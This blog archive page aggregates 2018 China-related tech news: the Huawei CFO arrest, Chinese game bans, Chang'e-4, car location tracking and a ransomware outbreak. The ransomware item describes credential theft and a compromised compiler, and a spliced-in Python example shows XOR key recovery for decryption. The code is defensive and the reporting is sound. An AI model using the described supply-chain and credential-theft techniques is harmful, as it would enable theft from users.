Category Archives: china

Qualcomm Asks China To Ban the iPhone XS and XR

After securing a win in court earlier this week to ban Apple's older phones, Qualcomm is trying to get the newer iPhones banned too. "According to the Financial Times, Qualcomm has now asked Chinese courts to issue an injunction that bans Apple from selling the iPhone XS, XS Max, and XR within the country due to the same case of possible patent infringement," reports The Verge. From the report: The new filing will escalate the companies' legal conflict in China, where Apple has so far ignored a court-ordered sales ban. Apple claims the ban only applied to phones running iOS 11 and earlier. Since its phones have now been updated to iOS 12, Apple believes they can remain on sale, and so it has continued to sell them. According to the Financial Times, the Chinese court's order doesn't specifically mention any version of Apple's operating system. That doesn't necessarily mean Apple is wrong, but it does mean that there's more to be hashed out.

Read more of this story at Slashdot.

President Trump To Use Huawei CFO As a Bargaining Chip

hackingbear shares a report from Politico, adding: "This fuels the suspicion that the Chinese executive is held as a hostage for the ongoing trade negotiation with China." From the report: President Donald Trump said on Tuesday that he reserved the right to weigh in on the Justice Department's case against the CFO of Huawei, if it would help him close a trade deal with Beijing or would serve other American national security interests. "If I think it's good for what will be certainly the largest trade deal ever made -- which is a very important thing -- what's good for national security -- I would certainly intervene if I thought it was necessary," Trump told Reuters. Trump added that President Xi Jinping of China had not called him about the case, but that the White House had been in touch with both the Justice Department and Chinese officials. Huawei's CFO, Meng Wanzhou, was arrested in Canada earlier this month at the request of American authorities, who allege that she violated U.S. sanctions against Iran. Yesterday, a Vancouver judge ruled that Meng would be released on a $7.5 million bail if she remains in British Columbia.

Read more of this story at Slashdot.

Episode 124: The Twitter Accounts Pushing French Protests. Also: social engineering the Software Supply Chain

In this week’s podcast (#124): we speak with French security researcher Baptiste Robert about research on the social media accounts pushing the French "Yellow Vest" protests. Surprise, surprise: they're not French. Also: Brian Fox of the firm Sonatype joins us to talk about the recent compromise of the GitHub event-stream project and why...


Is 2019 Privacy Rights’ Break Out Year?

Whatever else it may bring, 2019 will be a breakout year for online privacy, as the EU’s GDPR takes root and legislation in other nations follows suit. But not everyone is on board with the new privacy regime. Who will be the privacy leaders and laggards in the New Year?


China To Force Changes To 20 Popular Games, Ban 9 Including Fortnite and PUBG

An anonymous reader quotes a report from the BBC: A panel of censors set up to vet mobile video games in China has signaled it will be hard to please. State media reports that of the first 20 titles it assessed, nine were refused permission to go on sale. The Xinhua news agency added that developers of the other 11 had been told they had to make adjustments to remove "controversial content." The authorities have voiced concerns about the violent nature of some titles as well as worries about the activity being addictive. It was announced in August that a new body -- the State Administration of Press and Publications -- had taken over responsibility for approving games and that it would limit the number of online titles available. And although it has not been specified, some experts are assuming that the new panel will operate under its auspices. Xinhua said it is comprised of gaming experts, government-employed researchers, and representatives from the media and video games industry. But it provided no other information about who they were or the titles they had already examined. UPDATE: The list of games being examined by the ethics panel has been revealed by users on NGA, a Chinese gaming forum. A number of games, such as League of Legends, Overwatch, Diablo, and World of Warcraft, will need "corrective action," while others will be "banned/withdrawn" entirely. Some of the most popular prohibited titles include Fortnite and PlayerUnknown's Battlegrounds (PUBG).

Read more of this story at Slashdot.

China Forms New Body To Review Ethics Risks of Video Games

China has established a new body that reviews ethical issues in video gaming, marking the country's latest attempt to tighten control over the world's biggest games market. From a report: The recently formed Online Games Ethics Committee has so far evaluated an initial batch of 20 video game titles, according to a report on Friday from state broadcaster China Central Television (CCTV). This was the first time the committee's existence was made public. Without elaborating, the CCTV report said the ethics committee rejected nine games for publication in the domestic market, while ruling that certain content be modified in the 11 other games that were reviewed. The report neither revealed which government department the ethics committee was directly under nor identified the 20 games that the body processed. The creation of the Online Games Ethics Committee has come amid concerns over internet addiction, childhood myopia and unsuitable content in China's US$38 billion video games market, which has led Beijing to tighten its control over the industry and freeze the approval of new titles this year.

Read more of this story at Slashdot.

Can the US Stop China From Controlling the Next Internet Age?

Tech executives worry China will turn to tit-for-tat arrests of Americans in response to the detention of Meng Wanzhou. And the worries don't stop there. Kara Swisher, writing at The New York Times: Imagine, if you will (and you should), a big American tech executive being detained over unspecified charges while on a trip to Beijing. That is exactly what a number of Silicon Valley executives told me they are concerned about after the arrest this week of Meng Wanzhou, the chief financial officer of the Chinese telecom company Huawei, in Canada at the behest of United States officials. "It's worrisome, because it's an escalation we did not need," one executive said, referring to the already tense trade talks between the two countries. "What China will do, given all the existing tensions, is anyone's guess." No one I spoke to would talk on the record, out of fear of antagonizing either side and also because no one knows exactly what is happening. But many expressed worry about the possibility of tit-for-tat arrests. While everyone focuses on the drama of the arrest -- Ms. Meng was grabbed while changing planes at the airport -- and its effect on the trade talks and stock prices, to my mind there is a much more important fight brewing, and it is about tech hegemony. Specifically, who will control the next internet age, and by whose rules will it be run? Until recently, that answer was clearly the United States, from which the Internet sprang, wiring the world together and, in the process, resulting in the greatest creation of power and wealth in history. While China has always had a strong technology sector, in recent years it has significantly escalated its investment, expertise and innovation, with major support from the government. That hand-in-glove relationship creates obvious issues, and the Trump administration is right to stop pretending that China does not present a threat both from security and innovation perspectives. Further reading: China summons U.S. ambassador, warns Canada of 'grave consequences' if Huawei executive Meng Wanzhou is not released.

Read more of this story at Slashdot.

China’s Chang’e-4 Launches On Mission To the Moon’s Far Side

An anonymous reader quotes a report from The New York Times: China is aiming to go where no one has gone before: the far side of the moon. A rocket carrying the Chang'e-4 lunar lander blasted off at about 2:23 a.m. local time on Saturday from Xichang Satellite Launch Center in southern China. (In the United States, it was still midday Friday.) Chinese authorities did not broadcast the launch, but an unofficial live stream recorded near the site showed the rocket rise from the launch pad until its flames looked like a bright star in the area's dark skies. Nearly one hour later, Xinhua, China's state-run news agency, reported that Chang'e-4 had successfully launched. Exactly when it will set down at its destination has not yet been announced -- possibly in early January -- but Chang'e-4 will provide the first close-up look at a part of the moon that is eternally out of view from Earth. The rover will attempt to land in the 110-mile-wide Von Karman crater. The crater is within an area known as the South Pole-Aitken basin, a gigantic, 1,600-mile wide crater at the bottom of the moon, which has a mineralogy distinct from other locations. "That may reflect materials from the inside of the moon that were brought up by the impact that created the basin," reports The New York Times. The suite of instruments on the rover and the lander -- cameras, ground-penetrating radar and spectrometers -- "will probe the structure of the rocks beneath the spacecraft, study the effects of the solar wind striking the lunar surface," the report says. "Chang'e-4 will also test the ability of making radio astronomy observations from the far side of the moon, without the effects of noise and interference from Earth." It will also see if plant seeds will germinate and silkworm eggs will hatch in the moon's low gravity.

Read more of this story at Slashdot.

Chinese Mobile App Companies Are a National Security Risk, Says a Top Democrat

Chinese mobile app companies pose the same national security risk to the US as telecom giants like Huawei and ZTE, Sen. Mark Warner said in an interview. From a report: Recent US legislation largely banned Huawei and ZTE from use by the government and its contractors, due to concerns about surveillance and other national security risks. Now Warner, the top Democrat on the Senate Intelligence Committee, is signaling that Chinese app developers may face similar scrutiny from lawmakers, corporate America, and the intelligence community. Warner's comments follow a recent BuzzFeed News report that popular apps from China's Cheetah Mobile and Kika Tech were exploiting user permissions to engage in a form of ad fraud. Eight Android apps with more than 2 billion total downloads were said to be engaging in a form of app-install ad fraud. Google subsequently removed two of the apps from the Play store and said it continues to investigate. Cheetah and Kika deny engaging in app-install fraud. "Under Chinese law, all Chinese companies are ultimately beholden to the Communist Party, not their board or shareholders, so any Chinese technology company -- whether in telecom or mobile apps -- should be seen as extensions of the state and a national security risk," Warner said in an interview this week with BuzzFeed News. Further reading: Sen. Warner calls for US cyber doctrine, new standards for security.

Read more of this story at Slashdot.

Trade war tensions with China rise following arrest of Huawei CFO in Canada

Wanzhou Meng, Huawei’s CFO and the daughter of the company’s founder, was arrested at the Vancouver airport on Dec. 1 and is awaiting extradition to the US to face trial on accusations that the US export sanctions against Iran were breached, writes the Globe and Mail. Her bail hearing is on Dec. 7.

Further details were not provided due to Meng’s request for a publication ban.

“She is sought for extradition by the United States, and a bail hearing has been set for Friday,” Justice Department spokesman Ian McLeod said in a statement to the Toronto-based newspaper on Wednesday. “As there is a publication ban in effect, we cannot provide any further detail at this time. The ban was sought by Ms. Meng.”

The US government released several warnings advising consumers to not purchase Huawei smartphones as it considers them a threat to national security. In April it was announced that the company was already under investigation for illegal sales violating US sanctions against Iran, following similar allegations against Chinese company ZTE. The use of Huawei devices has been banned in the US government, which has also sought to persuade other countries to ban the Chinese manufacturer.

“After the Trump Administration imposed a ban on the sale of American technologies to ZTE last week for similar export violations, this latest development feels like deja vu all over again and could cast a serious shadow over the business of the $92.5 billion Chinese company,” wrote Forbes at the time.

In 2016, the US government issued a subpoena to investigate Huawei’s export of US technology over the previous five years to advocates of international terrorism or nations under US trade sanctions and economic embargo such as North Korea, Iran, Cuba, Sudan and Syria.

Regarding Meng’s arrest, Canadian Prime Minister Justin Trudeau said the Canadian government is not involved and that the arrest followed an extradition request from the US government.

Calling it a human rights violation, the Chinese embassy in Ottawa demanded her immediate release, saying she had not broken the laws of the US or Canada.

“The detention without giving any reason violates a person’s human rights,” responded a Chinese foreign ministry spokesperson. “We have made solemn representations to Canada and the US, demanding that both parties immediately clarify the reasons for the detention, and immediately release the detainee to protect the person’s legal rights.”


According to Reuters, Meng has been associated with Skycom Tech and a 2010 deal, which was not finalized, to sell HP equipment to Iran with the approval of Huawei. Whether this is connected with the charges now brought against her is unknown; details have not been released.

China Calls For Release of Arrested Huawei CFO Detained In Canada

China is demanding the release of a senior executive at Huawei after she was detained in Canada on extradition charges to the U.S. Wanzhou Meng, who is also the deputy chair of Huawei's board and the daughter of company founder Ren Zhengfei, is suspected of violating U.S. trade sanctions against Iran. NBC News reports: The arrest of Meng Wanzhou, chief financial officer and daughter of the company's founder Ren Zhengfei, spooked investors with U.S. stocks tumbling on fears of a flare-up in Chinese-U.S. tensions. She was arrested in Vancouver, British Columbia, on Dec. 1. China's Ministry of Foreign Affairs said officials have been contacted both in the U.S. and Canada to demand Meng's release. Geng Shuang, a spokesman for the ministry, said her detention needed to be explained, and both countries had to "effectively protect the legitimate rights and interests of the person concerned." A spokesperson for Huawei said in a statement that it "complies with all applicable laws and regulations where it operates, including applicable export control and sanction laws and regulations."

Read more of this story at Slashdot.

Hackers Behind Breach at Hotel Group Marriott Left Clues Suggesting They Were Working For Chinese Government Intelligence Gathering Operation, Report Says

Marriott said last week that a hack that began four years ago had exposed the records of up to 500 million customers in its Starwood hotels reservation system. Private investigators looking into the breach have found hacking tools, techniques and procedures previously used in attacks attributed to Chinese hackers, Reuters reported, citing three sources who were not authorized to discuss the company's private probe into the attack. From the report: That suggests that Chinese hackers may have been behind a campaign designed to collect information for use in Beijing's espionage efforts and not for financial gain, two of the sources said. While China has emerged as the lead suspect in the case, the sources cautioned it was possible somebody else was behind the hack because other parties had access to the same hacking tools, some of which have previously been posted online.

Read more of this story at Slashdot.

More Than 100,000 PCs in China Infected by New Ransomware Strain

A new ransomware strain successfully infected more than 100,000 personal computers in China over a period of just four days. According to a report from Velvet Security, the first samples of this ransomware broke out on 1 December after users installed multiple social media-themed apps including “Account Operation V3.1,” an app designed to help users […]

The post More Than 100,000 PCs in China Infected by New Ransomware Strain appeared first on The State of Security.

New strain of Ransomware infected over 100,000 PCs in China

Security experts reported a new strain of malware spreading in China; the malicious code rapidly infected over 100,000 PCs in just four days.

Unfortunately, the number of infections is rapidly increasing because hackers compromised a supply chain.

It is interesting to note that this ransomware requests victims to pay 110 yuan (nearly Euro 14) in ransom through WeChat Pay.

“On December 1, the first ransomware that demanded the ‘WeChat payment’ ransom broke out in the country. According to the monitoring and evaluation of the ‘Colvet Threat Intelligence System’, as of the evening of the 4th, the virus infected at least 100,000 computers, not only locked the computer.” reads the analysis published by anti-virus firm Velvet Security.

“The document also steals information on tens of thousands of user passwords on platforms such as Taobao and Alipay.”

Victims are prompted to pay the ransom to the attackers’ WeChat account within 3 days to receive the decryption key. If the victim doesn’t pay within that time, the malicious code deletes the decryption key from the C&C server.

The malicious code also implements password-stealing capabilities: the ransomware is able to steal users’ credentials for popular Chinese services, including Alipay, the NetEase 163 email service, Baidu Cloud Disk, Jingdong, Taobao, Tmall, AliWangWang, and QQ websites.

The ransomware also collects information on the infected system, including CPU model, screen resolution, network information and list of installed software.

According to experts from Velvet Security, hackers compromised the supply chain of the “EasyLanguage” programming software used by a large number of application developers.

The tainted development tool injects the malicious code into every program compiled with it, so the infection spreads through legitimate-looking applications built by unwitting developers.

To avoid detection, the author of the threat signed the code with a trusted digital certificate issued by Tencent Technologies and skipped encrypting data in some specific directories, such as “Tencent Games”, “League of Legends”, “tmp”, “rtl”, and “program”.

The good news for the victims is that researchers were able to crack the ransomware: the experts discovered that the malware uses a simple XOR cipher, instead of DES, to encrypt files, and that it also stores a copy of the decryption key locally on the victim’s system in the following path:


Velvet experts released a free ransomware decryption tool that can be used to decrypt documents encrypted by the malware.
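The following is an added example, not Velvet Security's decryptor nor code from the malware: it shows why the design described above (repeating-key XOR with a key copy left on disk) is recoverable, and goes one step further by recovering the key from a known file header alone. The key, its length and the sample document are constructed assumptions; the page gives none of those details.

```python
# Added example (not Velvet Security's tool or the malware's code).
# Demonstrates two recovery paths against repeating-key XOR ransomware:
#   1. decrypt with the key copy the malware left on the victim's disk;
#   2. recover the key from known plaintext (a fixed file header) even
#      if that local copy were missing.
# SAMPLE_KEY, its 5-byte length and the sample file are constructed for
# this demo; the real key format is not described on the page.
from itertools import cycle

SAMPLE_KEY = bytes.fromhex("5aa3170c91")                 # constructed key
SAMPLE_PLAINTEXT = b"%PDF-1.7\n%constructed sample document body for the demo\n"
KNOWN_HEADER = b"%PDF-1.7\n"   # known plaintext: PDFs start with this header


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. XOR is its own inverse, so the same
    function encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def decrypt_with_stored_key(ciphertext: bytes, stored_key: bytes) -> bytes:
    """Recovery path 1: the malware stored a copy of the key locally, so
    applying the same XOR again restores the file."""
    return xor_bytes(ciphertext, stored_key)


def recover_xor_key(ciphertext: bytes, known_prefix: bytes, max_key_len: int) -> bytes:
    """Recovery path 2: known-plaintext attack on repeating-key XOR.

    For each candidate key length L, derive the key from the first L bytes
    (ciphertext XOR known plaintext), then check that this key reproduces
    the *rest* of the known prefix. A wrong L fails that check, so the
    shortest L that passes is the key. Requires len(known_prefix) > L."""
    for key_len in range(1, max_key_len + 1):
        if key_len >= len(known_prefix):
            break  # nothing left to verify the candidate against
        candidate = bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix))
        if xor_bytes(ciphertext[:len(known_prefix)], candidate) == known_prefix:
            return candidate
    raise ValueError("no repeating XOR key up to max_key_len reproduces the known prefix")


def looks_like_pdf(data: bytes) -> bool:
    """Post-decryption sanity check: verify the expected header is back
    instead of trusting the recovered key blindly."""
    return data.startswith(b"%PDF-")


if __name__ == "__main__":
    ciphertext = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)   # what a victim would hold
    key = recover_xor_key(ciphertext, KNOWN_HEADER, max_key_len=32)
    recovered = decrypt_with_stored_key(ciphertext, key)
    assert recovered == SAMPLE_PLAINTEXT and looks_like_pdf(recovered)
    print("recovered key:", key.hex(), "-> file restored")
```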

Experts attributed the ransomware to a software programmer named “Luo,” and reported their discovery to the Chinese authorities.


Pierluigi Paganini

(Security Affairs – cybercrime, China)

The post New strain of Ransomware infected over 100,000 PCs in China appeared first on Security Affairs.

China Announces Punishments For Intellectual-Property Theft

China has announced an array of punishments that could restrict companies' access to borrowing and state-funding support over intellectual-property theft. The news comes after the G20 Summit in Argentina, where the Trump Administration agreed to hold off on tariff action for at least 90 days as they negotiate to resolve specific U.S. complaints. Bloomberg reports: China set out a total of 38 different punishments to be applied to IP violations, starting this month. The document, dated Nov. 21, was released Tuesday by the National Development and Reform Commission and signed by various government bodies, including the central bank and supreme court. China says violators would be banned from issuing bonds or other financing tools, and participating in government procurement. They would also be restricted from accessing government financial support, foreign trade, registering companies, auctioning land or trading properties. In addition, violators will be recorded on a list, and financial institutions will refer to that when lending or granting access to foreign exchange. Names will be posted on a government website. "This is an unprecedented regulation on IP violation in terms of the scope of the ministries and severity of the punishment," said Xu Xinming, a researcher at the Center for Intellectual Property Studies at China University of Political Science and Law. The newly announced punishments are "a security net of IP protection" targeting repeat offenders and other individuals who aren't in compliance with the law, he said.

Read more of this story at Slashdot.

China Set To Launch First-Ever Spacecraft to the Far Side of the Moon, Will Attempt To Grow Plant There

AmiMoJo writes: Later this week, China plans to launch its Chang'e-4 spacecraft to the far side of the lunar surface. The aim is to land a rover on the dark side of the moon for the first time. Blocked from direct communication with the Earth, the lander and rover will depend on China's Queqiao communication satellite launched in May. If the landing is successful, the mission's main job will be to investigate this side of the lunar surface, which is peppered with many small craters. The lander will also conduct the first radio astronomy experiments from the far side of the Moon -- and the first investigations to see whether plants will grow in the low-gravity lunar environment. The ultimate goal of the China National Space Administration (CNSA) is to create a Moon base for future human exploration there, although it has not announced when that might happen. Chang'e-4 will be the country's second craft to 'soft' land on the lunar surface, following Chang'e-3's touchdown in 2013.

Read more of this story at Slashdot.

Steam is Finally Coming To China But Chinese Gamers Don’t Want It

Valve officially announced this week the arrival of Steam China in Shanghai. But Chinese gamers are telling the PC gaming platform to "get lost!" From a report: One of the most upvoted comments wrote, "Steam China get out of China." It's important to point out that gamers are directing their anger at Steam China, not Steam. In fact, Chinese gamers love Steam... the global version of it, anyway. There are an estimated 30 million Chinese users playing games on the platform -- games which otherwise aren't officially available in China. But that's exactly why they fear the launch of Steam China, which is a joint venture between Valve and Chinese company Perfect World. Gamers worry that not only will Steam China be a heavily censored platform with a much smaller lineup of titles; worse yet, it might also be the trigger for the government to ban the global version of Steam.

Read more of this story at Slashdot.

Automakers Give the Chinese Government Access To Location Data of Electric Cars

According to a new report from The Associated Press, a number of China's government officials and entities have had access to the location data of "new energy vehicles" from many different manufacturers. "More than 200 manufacturers (both national and foreign) transmit the data to 'government-backed monitoring centers,' according to the report, including one called 'The Shanghai Electric Vehicle Public Data Collecting, Monitoring and Research Center' and another known as the 'National Big Data Alliance of New Energy Vehicles,'" reports The Verge. From the report: Chinese officials told the AP that this data -- which includes the real-time location of cars, plus "dozens of other data points" -- is collected to "improve public safety" and "facilitate industrial development and infrastructure planning." The officials say the data is also used to "prevent fraud" in the government's subsidy program for new energy vehicles, which offers steep discounts on clean cars. The monitoring systems have been in place since the beginning of 2017, according to a report by the International Council on Clean Transportation from last year. Staffers at the data monitoring centers are able to look at a map, click on a car, and see things like make and model, mileage, and battery charge, according to the AP report.

Read more of this story at Slashdot.

Apple Reportedly Cuts Over 700 Apps from Chinese App Store

Apple has reportedly removed 718 apps from the Chinese App Store in the last few days. From a report: The iPhone maker swept out the apps because their developers pushed updates without its permission, The Telegraph reported, citing local reports. Apple warned developers against updating iOS apps without its permission in early 2017. The banned apps included Sogou's search engine and maps, online retailer Pinduodo and car sharing service Togo Car.

Read more of this story at Slashdot.

In China, Your Car Could Be Talking To the Government

schwit1 shares a report: More than 200 manufacturers, including Tesla, Volkswagen, BMW, Daimler, Ford, General Motors, Nissan, Mitsubishi and U.S.-listed electric vehicle start-up NIO, transmit position information and dozens of other data points to government-backed monitoring centers, The Associated Press has found. Generally, it happens without car owners' knowledge. The automakers say they are merely complying with local laws, which apply only to alternative energy vehicles. Chinese officials say the data is used for analytics to improve public safety, facilitate industrial development and infrastructure planning, and to prevent fraud in subsidy programs. But other countries that are major markets for electronic vehicles -- the United States, Japan, across Europe -- do not collect this kind of real-time data. And critics say the information collected in China is beyond what is needed to meet the country's stated goals. It could be used not only to undermine foreign carmakers' competitive position, but also for surveillance -- particularly in China, where there are few protections on personal privacy. Under the leadership of Xi Jinping, China has unleashed a war on dissent, marshalling big data and artificial intelligence to create a more perfect kind of policing, capable of predicting and eliminating perceived threats to the stability of the ruling Communist Party.

Read more of this story at Slashdot.

That Bloomberg Supply-Chain-Hack Story

Back in October, Bloomberg reported that China has managed to install backdoors into server equipment that ended up in networks belonging to -- among others -- Apple and Amazon. Pretty much everybody has denied it (including the US DHS and the UK NCSC). Bloomberg has stood by its story -- and is still standing by it.

I don't think it's real. Yes, it's plausible. But first of all, if someone actually surreptitiously put malicious chips onto motherboards en masse, we would have seen a photo of the alleged chip already. And second, there are easier, more effective, and less obvious ways of adding backdoors to networking equipment.

China Halts Work by Team on Gene-Edited Babies

China's government ordered a halt Thursday to work by a medical team that claimed to have helped make the world's first gene-edited babies, as a group of leading scientists declared that it's still too soon to try to make permanent changes to DNA that can be inherited by future generations. AP reports: Chinese Vice Minister of Science and Technology Xu Nanping told state broadcaster CCTV that his ministry is strongly opposed to the efforts that reportedly produced twin girls born earlier this month. Xu called the team's actions illegal and unacceptable and said an investigation had been ordered, but made no mention of specific actions taken. Researcher He Jiankui claims to have altered the DNA of the twins to try to make them resistant to infection with the AIDS virus. Mainstream scientists have condemned the experiment, and universities and government groups are investigating. His experiment "crossed the line of morality and ethics adhered to by the academic community and was shocking and unacceptable," Xu said. A group of leading scientists gathered in Hong Kong this week for an international conference on gene editing, the ability to rewrite the code of life to try to correct or prevent diseases.

Read more of this story at Slashdot.

Bloomberg is Still Reporting on Challenged Story Regarding China Hardware Hack

Erik Wemple, writing for The Washington Post: According to informed sources, Bloomberg has continued reporting the blockbuster story that it broke on Oct. 4, including a very recent round of inquiries from a Bloomberg News/Bloomberg Businessweek investigative reporter. In emails to employees at Apple, Bloomberg's Ben Elgin has requested "discreet" input on the alleged hack. "My colleagues' story from last month (Super Micro) has sparked a lot of pushback," Elgin wrote on Nov. 19 to one Apple employee. "I've been asked to join the research effort here to do more digging on this ... and I would value hearing your thoughts (whatever they may be) and guidance, as I get my bearings." One person who spoke with Elgin told the Erik Wemple Blog that the Bloomberg reporter made clear that he wasn't part of the reporting team that produced "The Big Hack." The goal of this effort, Elgin told the potential source, was to get to "ground truth"; if Elgin heard from 10 or so sources that "The Big Hack" was itself a piece of hackery, he would send that message up his chain of command. The potential source told Elgin that the denials of "The Big Hack" were "100 percent right." According to the potential source, Elgin also asked about the possibility that Peter Ziatek, senior director of information security at Apple, had written a report regarding a hardware hack affecting Apple. In an interview with the Erik Wemple Blog, Ziatek says that he'd never written that report, nor is he aware of such a document. Following the publication of Bloomberg's story, Apple conducted what it calls a "secondary" investigation surrounding its awareness of events along the lines of what was alleged in "The Big Hack." That investigation included a full pat-down of Ziatek's own electronic communications. It found nothing to corroborate the claims in the Bloomberg story, according to Ziatek.

Read more of this story at Slashdot.

China Expands Research Funding, Luring US Scientists and Students

An anonymous reader quotes a report from NPR: In the past decade or so, China has been expanding its commitment to scientific research, and it shows. Chinese researchers now produce more scientific publications than U.S. scientists do, and the global ratings of Chinese universities are rising. Five years ago [professor of chemistry at the University of California, San Diego, Jay Siegel] became dean of the school of pharmaceutical science and technology at Tianjin University. He says the university president recruited him to build an undergraduate program that would attract students from all over -- not just China. Siegel says the program is taught entirely in English. There's another aspect of getting a pharmaceutical science degree at Tianjin that Siegel expects students from throughout the world to find particularly attractive: The Chinese government plans to offer scholarships to cover the cost for students who enroll. Siegel says this is all part of China's effort to attract international scientists. Of course, there are some drawbacks with working in China. There are internet restrictions, making it difficult to reach certain websites; English isn't spoken throughout most of the country, posing a problem for many foreign visitors; and free speech isn't the same concept as it is in the United States. With that said, "There's no interference politically on the science," says Greg Herczeg, an astronomer at the Kavli Institute for Astronomy and Astrophysics at Peking University. "We've had no political restrictions," says Siegel. "I know that people talk about them being out there, and I've heard rumors of things. But, for us personally, I would have to say no, I've not had that experience."

Read more of this story at Slashdot.

China is Planning To Build a Deep Sea Base For Unmanned Submarine Science and Defense Operations in the South China Sea

Urged by China President Xi Jinping to dare to do something that has never been done before, scientists say challenges could give China huge technology lead. From a report: China is planning to build a deep sea base for unmanned submarine science and defence operations in the South China Sea, a centre that might become the first artificial intelligence colony on Earth, officials and scientists involved in the plan said. The project -- named in part after Hades, the underworld of Greek mythology -- was launched at the Chinese Academy of Sciences in Beijing this month after a visit to a deep sea research institute at Sanya, Hainan province, by Chinese President Xi Jinping in April. Xi urged the scientists and engineers to dare to do something that has never been done before. "There is no road in the deep sea, we do not need to chase [after other countries], we are the road," he said. The idea of an outpost for deep sea exploration has been a favourite of scientists, engineers and fiction writers for hundreds of years, while the Greek allegory of Atlantis has inspired many "city beneath the sea" stories. The Hadal zone that would be home to the base is the deepest part of an ocean -- typically a V-shape abyss -- at a depth of 6,000 to 11,000 metres (19,685 to 36,100 feet). The project will cost Chinese taxpayers 1.1 billion yuan (US$160 million), the scientists said. That is half as much again as the cost of the FAST radio telescope -- the world's largest -- in Guizhou province, southwest China.

Read more of this story at Slashdot.

Popular Android apps on Play Store caught defrauding users

By Waqas

A well-known Chinese app developer Cheetah Mobile and one of its subsidiaries Kika Tech might have claimed credit for millions of dollars from advertisers through an Android fraud scheme, reveals app analytics firm Kochava. It is a common practice for mobile app developers to generate revenue by marketing for new apps inside their apps for […]

This is a post from Read the original post: Popular Android apps on Play Store caught defrauding users

Chinese Scientist Says He’s First To Create Genetically Modified Babies Using CRISPR

For the first time, a scientist claims to have used a powerful new gene-editing technique to create genetically modified human babies. From a report: The scientist, He Jiankui of the Southern University of Science and Technology in Shenzhen, China, says he used human embryos modified with the gene-editing technique CRISPR to create twin girls. "Two beautiful little Chinese girls named Lulu and Nana came crying into the world as healthy as any other babies a few weeks ago," He says in a video posted online. "The babies are home now with their mom Grace and their dad Mark." He says his team performed "gene surgery" on embryos created from their parents' sperm and eggs to protect the children from the human immunodeficiency virus, HIV, which causes AIDS. The children's father is HIV-positive. "When Lulu and Nana were just a single cell, this surgery removed a doorway through which HIV enter to infect people," He says in the video, one of several posted online to justify and explain the work. Because the research has not yet been published in a scientific journal or carefully vetted by other scientists, many researchers and bioethicists remain cautious about the claim.

Read more of this story at Slashdot.

China’s Cashless Economy Threatens To Leave Its Elderly — and Their Money — Behind

An anonymous reader shares a report: With his cellphone in one hand, and two wooden meditation balls in the other, Zhang Siqi queued up alongside throngs of fellow retirees that make up the morning rush at a small Beijing grocery store. Zhang, a Beijing native, then opened the WeChat mobile pay tab on his phone and scanned it at the automatic register to pay for some fruit and a pack of cigarettes with a savviness that belied his age. That cutting-edge payment method is rapidly becoming so common in Beijing and other large cities that experts have begun referring to the Chinese capital as a prototype of the futuristic cashless society. In 2017, the country saw $15 trillion in mobile payments, the Wall Street Journal reported, far outstripping the US. While Zhang has been using WeChat social media and mobile pay functions for a few years now, the 63-year-old knows not every Chinese senior citizen is equally adept. "Some old people find it difficult to keep up with technology. Many retirees have poor eyesight, and struggle to see the screen, or have a poor memory and keep forgetting how to use the apps," he said, pocketing his phone with his right hand, and rolling the wooden meditation balls with his left. Those issues were brought into sharp focus recently by a viral video of an older Chinese patron arguing with the staff at the checkout of a supermarket in northern China over how to pay for a bag of grapes -- the staff told him he needed to pay by app, but eventually relented and allowed him to pay by cash. A slew of viewers expressed sympathy for the demoralized customer, including consultant Matthew Brennan, who writes about China's ever-evolving tech scene.

Read more of this story at Slashdot.

How Surveillance Inhibits Freedom of Expression

In my book Data and Goliath, I write about the value of privacy. I talk about how it is essential for political liberty and justice, and for commercial fairness and equality. I talk about how it increases personal freedom and individual autonomy, and how the lack of it makes us all less secure. But this is probably the most important argument as to why society as a whole must protect privacy: it allows society to progress.

We know that surveillance has a chilling effect on freedom. People change their behavior when they live their lives under surveillance. They are less likely to speak freely and act individually. They self-censor. They become conformist. This is obviously true for government surveillance, but is true for corporate surveillance as well. We simply aren't as willing to be our individual selves when others are watching.

Let's take an example: hearing that parents and children are being separated as they cross the US border, you want to learn more. You visit the website of an international immigrants' rights group, a fact that is available to the government through mass Internet surveillance. You sign up for the group's mailing list, another fact that is potentially available to the government. The group then calls or e-mails to invite you to a local meeting. Same. Your license plates can be collected as you drive to the meeting; your face can be scanned and identified as you walk into and out of the meeting. If, instead of visiting the website, you visit the group's Facebook page, Facebook knows that you did and that feeds into its profile of you, available to advertisers and political activists alike. Ditto if you like their page, share a link with your friends, or just post about the issue.

Maybe you are an immigrant yourself, documented or not. Or maybe some of your family is. Or maybe you have friends or coworkers who are. How likely are you to get involved if you know that your interest and concern can be gathered and used by government and corporate actors? What if the issue you are interested in is pro- or anti-gun control, anti-police violence or in support of the police? Does that make a difference?

Maybe the issue doesn't matter, and you would never be afraid to be identified and tracked based on your political or social interests. But even if you are so fearless, you probably know someone who has more to lose, and thus more to fear, from their personal, sexual, or political beliefs being exposed.

This isn't just hypothetical. In the months and years after the 9/11 terrorist attacks, many of us censored what we spoke about on social media or what we searched on the Internet. We know from a 2013 PEN study that writers in the United States self-censored their browsing habits out of fear the government was watching. And this isn't exclusively an American event; Internet self-censorship is prevalent across the globe, China being a prime example.

Ultimately, this fear stagnates society in two ways. The first is that the presence of surveillance means society cannot experiment with new things without fear of reprisal, and that means those experiments -- if found to be inoffensive or even essential to society -- cannot slowly become commonplace, moral, and then legal. If surveillance nips that process in the bud, change never happens. All social progress -- from ending slavery to fighting for women's rights -- began as ideas that were, quite literally, dangerous to assert. Yet without the ability to safely develop, discuss, and eventually act on those assertions, our society would not have been able to further its democratic values in the way that it has.

Consider the decades-long fight for gay rights around the world. Within our lifetimes we have made enormous strides to combat homophobia and increase acceptance of queer folks' right to marry. Queer relationships slowly progressed from being viewed as immoral and illegal, to being viewed as somewhat moral and tolerated, to finally being accepted as moral and legal.

In the end, it was the public nature of those activities that eventually slayed the bigoted beast, but the ability to act in private was essential in the beginning for the early experimentation, community building, and organizing.

Marijuana legalization is going through the same process: it's currently sitting between somewhat moral, and -- depending on the state or country in question -- tolerated and legal. But, again, for this to have happened, someone decades ago had to try pot and realize that it wasn't really harmful, either to themselves or to those around them. Then it had to become a counterculture, and finally a social and political movement. If pervasive surveillance meant that those early pot smokers would have been arrested for doing something illegal, the movement would have been squashed before inception. Of course the story is more complicated than that, but the ability for members of society to privately smoke weed was essential for putting it on the path to legalization.

